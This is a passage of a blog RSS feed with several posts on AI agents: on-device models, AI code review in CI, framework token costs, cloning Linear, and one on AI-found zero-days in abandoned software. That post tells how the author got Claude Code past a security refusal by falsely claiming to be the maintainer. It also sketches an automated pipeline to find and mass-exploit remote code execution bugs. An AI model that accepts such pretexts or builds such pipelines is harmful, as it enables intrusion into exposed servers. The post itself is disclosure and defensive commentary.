<p>A consumer device might be able to process tokens on the order of 30tok/s on a small, local model. This is actually surprisingly usable - not fast, but probably passable for many use cases.</p>
<p>However, as context scales - and as I described before, it <em>massively</em> scales in agentic tasks - the processing speed drops off a cliff. To put this in perspective, even a Radeon 9070 XT - a 304W desktop GPU - drops from 100 tok/s to less than 10 tok/s on an 8B model at 16K context once you factor in prefill. Good luck getting that on a phone.</p>
<img src="https://martinalderson.com/img/decode_speed_vs_context@2x.png" alt="Decode speed vs context length for on-device 7B model vs cloud 400B+ model" class="no-border" style="display: block; margin: 20px auto 40px; max-width: calc(100% - 40px);">
<blockquote>
<p>Cloud inference barely flinches as context grows. On-device collapses to near zero past 16K tokens - exactly where agentic tasks start.</p>
</blockquote>
<p>Speculative decoding - where a tiny draft model proposes tokens and a larger model verifies them - can help with speed. But it requires holding two models in RAM simultaneously, which makes the already dire memory situation even worse.</p>
<p>At this speed even a quick couple of paragraphs long email might take a minute to generate - at which point it's almost certainly quicker to type it yourself.</p>
<p>Even worse, hammering your phones hardware this hard for extended periods of time really impacts battery life and makes your phone heat up, so much so that the phone has to slow itself down to avoid overheating. This makes it <em>even slower</em>.</p>
<p>This is a far more difficult challenge than just providing more RAM. You need more compute (for prefill) and <em>much</em> faster memory. These are both expensive (with or without supply chain issues) and much more power hungry. It feels like we are still a way off even GDDR memory - which itself is still ~an order of magnitude slower than datacentre class HBM - being able to be put into a phone.</p>
<p>As you can see, between the RAM limits <em>and</em> speed limitations, on device models are going to have a very difficult time in the next year or two getting any real traction for even basic agentic workflows. Of course there could be some architecture breakthroughs that allow this - but assuming that doesn't happen - I think it is safe to say that most of us will be running most of our tokens through a cloud provider for the foreseeable future.</p>
<h2>Cloud offload</h2>
<p>This brings me to one last point - compute capacity on the cloud itself. While Apple has pushed the narrative of on device for simple tasks, and offloading to more capable models on the cloud, running the maths on this actually exposes some serious issues for agentic tasks.</p>
<p>It's hard to fathom the scale of the iOS installed base (and Android even larger). There's somewhere on the order of 2 <em>billion</em> active iOS devices, and another <em>4 billion</em> Android devices out there.</p>
<p>The compute demands to bring this <em>even on the cloud</em> to even a sizeable minority of these users is enormous. I estimate that Claude Code has low single digit millions of users, and I strongly suspect it is <em>melting</em> Anthropic's entire compute supply.</p>
<p>If Apple were to roll out agentic capabilities in to the OS - even with a lot of limitations - you are easily looking at requiring an entire Anthropic in terms of compute capacity, for just a small minority of iOS users.<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup></p>
<p>If anyone tells you on device models are just round the corner, they clearly haven't run the maths on the memory and compute requirements. Datacentres aren't going anywhere soon.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>This is a giant simplification and there are many approaches to reduce this. For example, hybrid attention significantly reduces KV cache memory requirements, but does trade off precision. There's a great roundup by <a href="https://magazine.sebastianraschka.com/p/the-big-llm-architecture-comparison">Sebastian Raschka</a>, but it gets extremely technical very quickly. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>Assuming even a 5% rollout to 100M active iOS users, and each user uses 5% of the tokens of a Claude Code user. This feels ~roughly reasonable in terms of token consumption - but it really depends on what the product looks like. Directionally this feels right to me though. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/why-on-device-agentic-ai-cant-keep-up/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/why-on-device-agentic-ai-cant-keep-up/</guid>
      <pubDate>Sun, 01 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Using OpenCode in CI/CD for AI pull request reviews</title>
      <description>Why I replaced SaaS code review tools with OpenCode running in CI/CD pipelines - cheaper, more secure, and works with any Git provider</description>
      <content:encoded><![CDATA[<p>Most existing AI code review tools require you to grant them access to your GitHub or GitLab repositories. While some of these tools are interesting, the security implications of handing over repo access to a third party are significant - and they're typically GitHub or GitLab-first. If you're working on projects that don't use either of those platforms, you're out of luck.</p>
<p>I run a few projects where we don't use GitHub or GitLab, so these tools simply aren't an option. That led me to explore an alternative: using <a href="https://opencode.ai/">OpenCode</a> - an open source agentic coding CLI, similar to Claude Code - with Codex 5.3, powered by a ChatGPT Plus or Team subscription.</p>
<h2>Why not just use the existing tools?</h2>
<p>The honest answer is I don't want to give another SaaS product access to my repositories. Yes, these companies probably handle your code responsibly - but also, famously, might not<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>. But it's another attack surface, another vendor to evaluate, another set of permissions to manage. I've written before about <a href="https://martinalderson.com/posts/ai-agents-are-starting-to-eat-saas/">agents eating SaaS</a> - and this is a perfect example. Why pay for a code review wrapper when you can just run the agent yourself?</p>
<p>And for anything that isn't on GitHub or GitLab - Bitbucket, self-hosted Gitea, whatever - you're on your own anyway. These tools (generally) don't support you.</p>
<h2>Setting up the pipeline</h2>
<p>The setup is surprisingly straightforward if you're working with any YAML-based CI/CD system - GitHub Actions, GitLab CI, Bitbucket Pipelines, whatever you prefer.</p>
<p>Your pipeline needs to:</p>
<ol>
<li>Clone the repo (most CI providers do this by default)</li>
<li>Install OpenCode - I run it in Docker with limited sandboxing</li>
<li>Copy in your OpenCode <code>auth.json</code> config file (I inject this via an environment variable - one annoyance is the OpenAI key expires after 14 days, so there may be a better way to handle this<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>)</li>
<li>Pass a prompt to OpenCode asking it to review the PR for code quality, potential bugs, and suggestions, based on a Git diff, outputting a <code>report.md</code> file</li>
<li>Post the output back to your Git provider as a PR comment via what ever API makes sense. You can also send to Slack or any other system here.</li>
</ol>
<p>That's it. The whole thing took me an afternoon to get working, and the review quality has been <em>genuinely</em> useful - not just &quot;add more comments&quot; noise.</p>
<p>It's actually a really short prompt I settled on and has been giving me pretty outstanding results that really just flags critical things:</p>
<pre><code>opencode run -m openai/gpt-5.3-codex &quot;

Code review for {{TYPE OF APP, e.g. TypeScript app doing...}}

1. Read CLAUDE.md first - architecture, lessons learned
2. Run: git diff $BASE_BRANCH...HEAD
3. Read full changed files + related files (interfaces, callers, services)

CONSERVATIVE REVIEW - False positives waste developer time:

- VERIFY every concern by reading the actual code before flagging
- Performance issue? Confirm caching/batching doesn't already exist
- Missing validation? Confirm it's not handled upstream
- Security concern? Trace the full request flow
- If you're not 90%+ sure after verification, don't flag it

Skip: style, formatting, naming, docs, hypotheticals.
                  
Also check what current tests may hit this, and if they are sufficient for these changes? DO NOT run the tests, just quick reasoning.
                  
This should be a separate section of your output report, titled Test Coverage

Write concise review to report.md with file:line refs. LGTM if good.
&quot;
</code></pre>
<p>You can tweak this to your requirements. I'd like to extend this further with ticket information, for example.</p>
<h2>The economics are hard to argue with</h2>
<p>This is the part that really got my attention. OpenAI lets you use your existing ChatGPT Plus, Pro, or Business subscription with OpenCode. There are no additional per-license, per-user, per-developer, or per-CI fees. OpenAI have <a href="https://x.com/thsottiaux/status/2009742187484065881">confirmed</a> they're actively working with OpenCode to support this. This is where I think Anthropic are making a major mistake - I'd love to use Claude Code in headless mode for this, but I'm not even sure if it's allowed under their ToS.</p>
<p>Compare that to the existing code review SaaS products charging per seat, per repo, or per PR. For a team of any size, the maths gets ugly fast. And if you're already paying for ChatGPT, the marginal cost of adding PR reviews is effectively zero.</p>
<p>I think this does show just how thin the layer AI wrappers have is. As agents get better and better, it's easier and easier to replace 'specialised' tools with this.</p>
<h2>You keep control of your code</h2>
<p>This matters more than people think. Your code passes through your CI/CD runners - that's expected and doesn't introduce a new threat surface. You're not granting OAuth access to a third party. You're not trusting that some startup's S3 bucket is properly locked down.</p>
<p>To be clear - your code is still being sent to OpenAI's API for inference, so it's not truly air-gapped in the default setup. But if you're already using any agentic coding tools (Claude Code, Codex, Cursor, etc.), your code is already going to these providers. The difference here is you're cutting out the <em>middleman</em> - there's no additional third party with persistent access to your repositories.</p>
<p>For organisations with genuinely high-sensitivity requirements, you can point OpenCode at a local model and run the whole thing air-gapped with absolutely nothing leaving your CI/CD environment. This obviously requires a decent amount of VRAM, but it's a genuinely promising way to bring agentic code review to environments where SaaS tools are a non-starter.</p>
<h2>Beyond PR reviews</h2>
<p>I've also built a Slack bot that works in exactly the same way. Instead of being triggered by a Git provider, you ask a question directly in Slack. The bot grabs a read-only copy of the repo, fires up OpenCode, and posts the output back as a reply on the thread.</p>
<p>Want to ask &quot;where is the retry logic for payment processing?&quot; without opening your IDE? Done. Need a quick summary of what changed in the last sprint? Done. It's basically giving your entire team a senior engineer they can ask questions to at any time.</p>
<h2>A note on Codex CLI</h2>
<p>I did try to get this working with Codex CLI itself, but ran into issues with sandboxing. It kept complaining about Landlock not being enabled on the kernel, so I switched to OpenCode.</p>
<p>OpenCode is also provider agnostic, so if OpenAI decides to change their ToS for this kind of activity you can just replace the <code>opencode run -m openai/gpt-5.3-codex</code> with <code>minimax/minimax-m2</code> in your pipeline file and run on another provider.</p>
<h2>What's next</h2>
<p>PR reviews are the obvious starting point, but some obvious next steps is getting the agent to actually resolve comments and propose a new PR. This would not be difficult to do with this pattern, but I'd like to spend some time building 'specialised' agents for other tasks past software engineering - for example, auditing the quality of the UX and giving suggestions if that is regressing in a PR.</p>
<p>If you're a smaller team already paying for ChatGPT subscriptions and also paying for a separate AI code review tool, it might be worth spending an afternoon seeing if you can replace the latter with the former.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>CodeRabbit <a href="https://kudelskisecurity.com/research/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories">famously</a> had a RCE which was executable within a .yml file which gave a potential attacker access to 1m GitHub repos <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>OpenCode uses OAuth tokens from ChatGPT which expire after 14 days. This is still very new so I expect this to improve, but for now you'll need to rotate these in your CI secrets periodically. A better approach would be to have a secrets manager grab and rotate this key automatically. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/using-opencode-in-cicd-for-ai-pull-request-reviews/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/using-opencode-in-cicd-for-ai-pull-request-reviews/</guid>
      <pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Which web frameworks are most token-efficient for AI agents?</title>
      <description>I benchmarked 19 web frameworks on how efficiently an AI coding agent can build and extend the same app. Minimal frameworks cost up to 2.9x fewer tokens than full-featured ones.</description>
      <content:encoded><![CDATA[<p>I wrote an article a couple of months ago about which languages are the <a href="https://martinalderson.com/posts/which-programming-languages-are-most-token-efficient/">most token efficient</a>. I've been thinking about this for quite a while - and many others have too, thinking through what happens to programming languages now increasingly agents are writing code, not humans.</p>
<p>However, it did occur to me that maybe this is the wrong angle to look at the question. These days, frameworks tend to matter <em>far</em> more than the language itself, so I thought I'd see if I could repeat the previous research by looking at what web frameworks were the most efficient.</p>
<h2>Methodology</h2>
<p>This isn't a hugely scientific approach - but I suspect it is directionally correct and maps to my own experience with various web frameworks.</p>
<p>I chose 19 different frameworks that I'm somewhat familiar with (some <em>far</em> more than others), and asked Claude Code w/ Opus 4.6 in a fresh context window with a prompt along these lines, slightly modifying it for each one. It was pretty much identical apart from framework specific libraries and setup (I wanted to focus more on its ability to code in the framework, rather than burning tokens choosing libraries that may not be installed on the system).</p>
<p>I also installed the main packages that each language needed, so the agent had npm, nodejs, go, cargo, etc preinstalled.</p>
<pre><code>Build a simple blog app using Express.js with EJS templates. It should have:
  1. A home page listing blog posts (title, date, excerpt)
  2. A post detail page showing the full post content
  3. A create post page with a form (title, body) that saves the post
  4. SQLite for persistent storage (use better-sqlite3)
  5. Basic CSS styling - make it look presentable, not raw HTML

  Run it on port 3003. Initialize with `npm init -y`, then install express, ejs,
  and better-sqlite3. When done, start the server and confirm it works by curling
  the home page. Leave the server running.

  Work in the current directory. Do not create a subdirectory - use the repo root
  as the project root.
</code></pre>
<p>I then left it running with it being allowed to do common read/write commands and use e.g. npm (or similar for the other ecosystems)<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>. Once they had completed I counted the number of tool calls, tokens, time elapsed and also checked that the server they started was running correctly and we had a blog presented with the specification.</p>
<h2>Results</h2>
<p>The first thing to point out was how <em>good</em> the results were in every single environment. Every single one produced a working blog with no obvious bugs<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>. While this is obviously a very simple prompt, they all figured out how to run the server, install any packages they needed, start the server and tested it worked. It astonishes me how far we've come in a year in agentic development - I think it would have been impressive if even one of these experiments worked out of the box back then.</p>
<p>I've grouped the frameworks in two categories:</p>
<ul>
<li>Minimal - web frameworks that are designed to be very small and don't tend to come with much functionality out of the box (think Express or Flask)</li>
<li>Full featured - bigger frameworks that tend to be far more opinionated and include a lot more functionality (Rails or Django).</li>
</ul>
<img src="https://martinalderson.com/img/framework-build-tokens.png" alt="Token usage across 19 web frameworks for initial blog app build" class="no-border" style="display: block; margin: 0 auto;">
<p>Very clear pattern on minimal frameworks being very token efficient. ASP.NET Minimal API was the cheapest at 26k tokens, while Phoenix was the most expensive at 74k - a 2.9x gap. The minimal frameworks all clustered tightly between 26-29k tokens, while the full featured ones spread from 28k (SvelteKit) all the way up to 74k.</p>
<p>SvelteKit and Django stood out to me as the most efficient of the full featured ones. Phoenix was very interesting, it spent an awful lot of tokens reading the scaffolded code - I suspect it just didn't have much in its training data so decided to read much more of the scaffolding output.</p>
<img src="https://martinalderson.com/img/framework-build-tool-uses.png" alt="Tool call usage across 19 web frameworks for initial blog app build" class="no-border" style="display: block; margin: 0 auto;">
<p>Similar pattern on tool calls - though there is definitely a pattern emerging that more esoteric frameworks tend to require more effort on the part of the agent.</p>
<h2>Follow up task</h2>
<p>While I thought this was interesting, I thought it'd be more interesting to then look at <em>adding</em> a feature to see how that changes things. As such I resumed each agent (the context of the build still in the context window) and sent this prompt:</p>
<pre><code>Add categories to the blog app. Each post belongs to one category. Specifically:
  1. Add a categories table with a name field
  2. Pre-seed 4 categories: Technology, Travel, Food, General
  3. Update the create post form with a category dropdown
  4. Show the category on the home page listing and post detail page
  5. Add a filter on the home page to view posts by category
Restart the server when done and verify it works by curling the home page.
</code></pre>
<p>Interestingly, Spring Boot resulted in a broken app - migrations didn't get run correctly - though if they were, then it'd have worked fine. Apart from that, all of the agents implemented this successfully. Again, 18/19 following prompts so well was very interesting to me - I again did not expect such a high success rate across such a variety of frameworks and ecosystems.</p>
<img src="https://martinalderson.com/img/framework-total-tokens.png" alt="Total token usage across 19 web frameworks for build plus feature addition" class="no-border" style="display: block; margin: 0 auto;">
<img src="https://martinalderson.com/img/framework-total-tool-uses.png" alt="Total tool call usage across 19 web frameworks for build plus feature addition" class="no-border" style="display: block; margin: 0 auto;">
<p>The follow-up did not have as much impact as I expected. Go stdlib really struggled (burnt through <em>so</em> many tool calls because of a problem with datetime parsing trying to upgrade the database). I was expecting to see the fully featured frameworks be far more efficient at features than the minimal ones - they'd already done all the &quot;DRY&quot; stuff, but this doesn't seem to be the case. Most frameworks landed in a 15-30k token band for the follow-up regardless of their initial build cost. The framework overhead hits you on the first build, but extending existing code costs roughly the same everywhere.</p>
<h2>Conclusions</h2>
<p>Minimal API web frameworks are <em>far</em> quicker and more cost effective for agents to work with. This is just a starting point - ideally I'd rerun each agent many times and try a much more complex project - but the direction is clear.</p>
<p>This shouldn't be a real surprise - they are for humans too. But the delta was bigger than I expected.</p>
<p>Having said that - all of the agents <em>did</em> get working software, even out of the quite esoteric ones. My main takeaway from this isn't actually about efficiency - it really shows that agents can build software with any framework you throw at them. If you are building a very quick and dirty app that needs a web interface though, it's probably better to use a minimal API framework. ASP.NET Minimal really shines here - it's statically typed and very fast to run, with low memory use.</p>
<p>In terms of more fully featured frameworks SvelteKit and Django really shine - this doesn't surprise me as they're both extremely well thought through web frameworks.</p>
<p>A 2.9x token gap doesn't matter much on a single task. It matters a lot when agents are building and modifying code hundreds of times a day.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>I felt this was more representative of how a developer may have their system set up than pure yolo mode. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>In the interests of transparency, I did have to rerun Rails and Laravel as it got completely stuck with various missing system packages. I felt this was fair as in the real world you wouldn't have missing system packages like it did here, but it was interesting to me that these popular frameworks gave the agents the most confusion trying to get them up and running. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/which-web-frameworks-are-most-token-efficient-for-ai-agents/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/which-web-frameworks-are-most-token-efficient-for-ai-agents/</guid>
      <pubDate>Mon, 23 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Who fixes the zero-days AI finds in abandoned software?</title>
      <description>Anthropic&#39;s red team found 500+ critical vulnerabilities with Claude. But they focused on maintained software. The scarier problem is the long tail that nobody will ever patch.</description>
      <content:encoded><![CDATA[<p>Anthropic's red team released research showing that Claude Opus 4.6 can find critical vulnerabilities in established open source projects. They found <a href="https://red.anthropic.com/2026/zero-days/">over 500 high-severity bugs</a> across projects like GhostScript and OpenSC - some of which had gone undetected for decades.</p>
<p>This is impressive, and genuinely useful work. But their research focused on <em>maintained</em> software - projects where patches can actually be shipped. The scarier problem is the enormous long tail of abandoned software that nobody will ever fix.</p>
<p>A few weeks before they published, I'd been testing the same idea against abandoned software.</p>
<h2>The issue</h2>
<p>It's been obvious for a while that AI agents are getting good at finding security vulnerabilities, but the pace is still surprising. Anthropic's Opus 4.6 paper found critical bugs that had gone undetected for decades in projects that actually have dedicated security teams. That's the maintained stuff. The unmaintained stuff is in a lot more trouble.</p>
<p>There is a <em>lot</em> of software out there. We've had ~40 years of internet enabled software. A lot of this is unsupported, and even the supported software has major delays in getting security patches.</p>
<p>This long tail of software hasn't been a (huge) security concern because each individual software package <em>used</em> to take human time to investigate and exploit. If an application only has a few hundred installs they tended to get overlooked.</p>
<h2>Finding a critical security vuln in &lt;15mins</h2>
<p>To test my theory out I asked Claude to find some software packages that are 'abandoned' by their maintainers but still has an active userbase. I did this a few weeks before the Anthropic paper came out - I was curious how far this had come in practice. It suggested a bunch of old PHP apps, one of which I had heard of before. So I decided to start there.</p>
<p>The process was very trivial. I cloned the repo, opened Claude Code, and asked it to find critical security vulnerabilities while I made a coffee. It found a bunch very quickly that turned out to be somewhat false positives (bad programming for sure but not directly exploitable).</p>
<p>So far, so secure. I changed approach and had it spin up the application in question and told it that we only care about vulnerabilities that can be exploited directly via a simple HTTP call - not convoluted attack patterns. The agent therefore had a feedback mechanism to find exploits, and attempt them against the containerised app.</p>
<p>Within 2-3 minutes it had found a 'promising' exploit, that initially failed because of some naïve filtering in the app. Another 2 minutes later it figured an encoding mechanism that bypassed the filtering the app did and it had found a complete RCE, and written a full proof of concept.</p>
<p>At this point I reached out to the maintainers of the (mostly it looks like) abandoned projects security email to let them know. I'm not naming the project here because there's no maintainer to ship a patch and thousands of servers are still exposed. It's been three weeks and I've heard nothing.</p>
<p>I estimate there are many thousands (minimum) of vulnerable servers.<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> Most look to be hosted on VPSs. The more concerning risk is the sensitive data likely sitting on them, but even as raw botnet infrastructure, that's a serious amount of firepower.</p>
<h2>Quantity, not quality</h2>
<p>It was clear to me that you could run an agent to find vulnerabilities like this automatically in a VM. Clone a git repo (based on some heuristics of popularity and last commit), ask it to set it up, find exploits, save them, discard VM and continue ad infinitum.</p>
<p>I suspect within days you could get dozens if not hundreds of RCE exploits. You could then have another agent scan and exploit as many servers as possible.</p>
<p>This flip in economics changes how we think about information security. When it used to &quot;cost&quot; time to find these bugs it simply wasn't worth infosec (either white, grey or blackhat) people spending time and effort to find vulnerabilities in the long tail, for the most part.</p>
<h2>Mitigations</h2>
<p>There has been some effort on the frontier AI labs side to stop this kind of research - Claude Code actually had a pretty strict system prompt to not allow even defensive security research when I ran this, which later got reverted. It did pop up at one point stopping itself in its tracks (arguably too late) saying that it actually can't do this kind of work and I need to use specialised tools.</p>
<p>Unfortunately it was trivial to bypass - I just said I was the maintainer of the project and we've had reports of a serious security vulnerability and we need to fix it. It totally understood - and continued, never to worry again about my intentions. I'm very doubtful trying to add guardrails to LLMs for this would work - it's too hard to differentiate between offensive and defensive security work, and I'm sure that more aggressive guardrails would end up with a lot of normal software tasks being flagged.</p>
<p>Plus we have the problem that the genie is out of the bottle on this - I'm sure that <em>even if</em> the frontier labs did manage to put effective guardrails, adversaries could build their own models off (e.g.) open weights models to do this.</p>
<h2>Defensive ability</h2>
<p>Sam Altman recently <a href="https://x.com/sama/status/2014733975755817267">wrote</a> on X:</p>
<img src="https://martinalderson.com/img/sama-defensive-tweet.png" alt="Sam Altman tweet about AI defensive capabilities" style="display: block; margin: 0 auto; margin-bottom: 1.5em; max-width: 500px;">
<p>Even Altman acknowledges that product restrictions are just a starting point - his long-term plan is &quot;defensive acceleration&quot;, helping people patch bugs faster. Which is great, but it still assumes there's someone on the other end to apply the patch. Anthropic's paper actually proves the point - they found the vulnerabilities, and patches got shipped. Great. But that playbook of 'find vulnerability, issue patch, wait for adoption' doesn't work when there's nobody to issue the patch.</p>
<p>I suspect this is going to require some quite drastic measures along the lines of disabling internet access to vulnerable servers en masse.<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup></p>
<p>The uncomfortable truth is that even Anthropic's research, <em>genuinely important</em> as it is, only scratches the surface. Finding bugs in maintained software and getting patches shipped is important work. But below that is a massive iceberg of software that nobody is maintaining and nobody will ever patch - and it's running on tens of millions of servers right now.</p>
<p>The only thing protecting it was that it wasn't worth a human's time to look. That's no longer true.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Based on Shodan fingerprinting of the application's default HTTP headers and page signatures. The actual number is likely higher as many instances will have been customised enough to evade simple fingerprinting. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>This isn't without precedent - ISPs and hosting providers already quarantine servers that are part of active botnets. The difference is scale: we're talking about proactively identifying and isolating tens of millions of servers running software that <em>will</em> be exploited, not just ones that already have been. In the meantime, if you run infrastructure, now is a good time to audit <em>all</em> listening services across your network - especially anything publicly accessible. If you find software that's no longer maintained, either firewall it off or migrate to a supported alternative. The days of &quot;nobody will bother attacking this&quot; are over. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/anthropic-found-500-zero-days/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/anthropic-found-500-zero-days/</guid>
      <pubDate>Tue, 17 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Attack of the SaaS clones</title>
      <description>I cloned Linear&#39;s UI and core functionality using Claude Code in about 20 prompts. Here&#39;s what that means for SaaS companies.</description>
      <content:encoded><![CDATA[<p>I cloned most of Linear's core functionality in 20 prompts using Claude Code. It took a couple of evenings and a few million tokens. Here's what I think that means for the future of SaaS economics.</p>
<h2>A quick recap</h2>
<p>In my previous two posts, <a href="https://martinalderson.com/posts/ai-agents-are-starting-to-eat-saas/">AI agents are starting to eat SaaS</a> and a more recent one about the <a href="https://martinalderson.com/posts/wall-street-lost-285-billion-because-of-13-markdown-files/">sharp decline in software company valuations</a>, I've covered some of the risks to existing SaaS businesses now agentic coding capabilities have increased so much (and perhaps more importantly, continued to improve so quickly, with no real slowdown in sight).</p>
<p>In these essays I argued that there are two emergent challenges to software businesses. Firstly, organisations will increasingly look to build their own &quot;internal&quot; versions of SaaS rather than procure external vendors.</p>
<p>Secondly, agents are increasingly replacing SaaS entirely. Take design - agents <a href="https://martinalderson.com/posts/how-to-make-great-looking-consistent-reports-with-claude-code-cowork-codex/">can build</a> pretty great looking reports and slide decks without an intermediary Google Slides, Figma or Prezi step. A lot of productivity and analytics software is at risk from being completely eaten by agents.</p>
<p>And even the threat of this will allow organisations to push back much harder on price increases from SaaS vendors. Given so much of SaaS is now owned by PE, who have borrowed money against future (growing) revenue streams<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>, this is a significant problem.</p>
<h2>But do people really want to manage internal SaaS?</h2>
<p>A (very) fair critique of a lot of the &quot;build your own SaaS&quot; narrative is that while people <em>can</em> build their own internal versions of SaaS, it's one thing building it and quite another managing it, updating it and running the infrastructure for it. It's hard to disagree with this - though I think it oversimplifies some of the competitive advantages companies can have from having bespoke line of business software that is perfectly aligned to their business goals.</p>
<p>But clearly, it's not a great idea for a company to be spending all their time building and managing tools that distract them from their main business. Adam Smith's pin factory still very much stands.</p>
<p>However, this overlooks that while the end <em>users</em> themselves may not want this headache of management, there <em>are</em> many people who would happily build competing platforms, manage it and sell it on for a fraction of the cost of existing SaaS vendors.</p>
<p>And this is where I think software companies are perhaps the most exposed.</p>
<h2>Building a Linear alternative in 20 prompts</h2>
<blockquote>
<p>Please note that this was built purely for research purposes and I have no intention to release this code nor commercialise this in any way. I'm not intending to infringe on anyone's brand, copyright or other intellectual property. I'm a huge fan of Linear and think it is a brilliant piece of design and software.</p>
</blockquote>
<p>To test this theory out (and to use the awesome new <a href="https://code.claude.com/docs/en/agent-teams">Teams</a> feature in Claude Code), I went about seeing how possible it would be for a coding agent to replicate Linear. Linear is an excellent project management tool, which I chose to look at simply because I've read <em>so many</em> comments in reply to my article(s) saying that while building a simple SaaS clone is possible, it wouldn't be possible to build a Linear clone.</p>
<p>I followed a pretty simple process. Firstly, I opened my web browser with DevTools open, and browsed the platform, collecting all the network traces.</p>
<img src="https://martinalderson.com/img/linear-devtools-har.png" alt="Chrome DevTools network tab showing Linear's network requests" style="display: block; margin: 0 auto 20px auto;">
<p>I interacted with a few features in the app so it'd have a trace of most of the software's functionality in this.</p>
<p>I then exported this as a HAR file (the rightmost icon above the search bar), which is an archive file of every network request. This produced an <em>enormous</em> HAR file with thousands of CSS and minified JS files.</p>
<h2>HAR to software</h2>
<p>I then set Claude Code off to use multiple subagents to understand all the functionality and the design of the software.</p>
<p>It did an <em>incredible</em> job at this, reverse engineering everything in the archive to a very high level of fidelity.</p>
<p>From this I used the new Teams feature in Claude Code to spin up multiple agents to start working on the front and backend of the product. This was very hands off; the first iteration was incredibly buggy, so I had to insist it start adding unit and integration tests. The quality dramatically improved after I did this.</p>
<p>I estimate I did 20 prompts, asking it to find placeholder content and replace it with actual functionality a few times.</p>
<p>A few million tokens later - which was more than covered by my $200/month Claude Max subscription - and I got a pretty faithful clone of Linear, with most key pieces of functionality working, persisting to a SQLite database.</p>
<p><em>[Video — view on blog]</em></p>
<blockquote>
<p>Built entirely from reverse-engineering network traces. No source code required.</p>
</blockquote>
<p>Now it's certainly not perfect and it's missing a lot of important pieces of functionality<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>.</p>
<p>My point here isn't that people can copy an existing project in 20 prompts and get it <em>perfect</em>. It's that I managed with Claude Code to do this in a couple of evenings while paying very little attention. I suspect a couple of motivated engineers could get a production quality version ready in a few weeks/months. Linear has had nearly a decade of some of the best designers and developers in the industry working extremely hard on it (and it shows) - it's renowned for its impeccable design and polish. Most SaaS isn't anywhere near that level. If an agent can produce a passable clone of Linear, it can probably do a <em>very</em> good job on the vast amount of SaaS out there that is, frankly, <em>barely</em> functional.</p>
<h2>What does this mean?</h2>
<p>I think all SaaS is vulnerable to this to some level. Software that has significant network effects or proprietary datasets, or specialised infrastructure requirements are much more defensible, however. I expect you could even just paste the public API docs of many projects in and get a pretty workable version of the software back - the API docs usually expose a <em>lot</em> of the inherent business logic in it.</p>
<p>In a way this isn't anything the industry hasn't seen before - indeed the PC itself was a clone of the original IBM PC. And we've had many people build compatible implementations of many APIs - the AWS S3 object storage API, the Java APIs<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup> and even ironically the OpenAI inference API standard itself have all become de-facto industry standards. Microsoft itself famously built most of its initial marketshare by doing exactly this - building affordable &quot;alternatives&quot; of existing software (MS-DOS, Windows, Excel and Word were all <em>extremely</em> inspired by their contemporaries in the market).</p>
<p>But now I think we have the ability of a handful of people to reimplement hundreds (or thousands) of developer-years of effort in a <em>very</em> compressed timescale. And I think this will become a pervasive risk for SaaS going forward. Much like Rocket Internet in the early 2010s cloned every popular American platform going for the European market, I think we are going to see some very high quality alternatives to every major SaaS vertical - but without requiring billions of dollars of VC money to do so.</p>
<p>And even if these platforms <em>don't</em> get marketshare for whatever reason - they again put downwards pressure on the software pricing equations. And most importantly, it doesn't require users to manage this themselves - they can get a familiar tool at a far lower cost.</p>
<p>Of course, the product is only one part of the equation. Sales, marketing, customer support, compliance certifications - these are all things that existing SaaS vendors have spent years and millions building out. But I think these are increasingly solvable with very small teams now too. AI is compressing the effort required across <em>all</em> of these functions, not just engineering. A handful of people can now credibly stand up a competing product <em>and</em> the business around it.</p>
<h2>Can SaaS companies fight back?</h2>
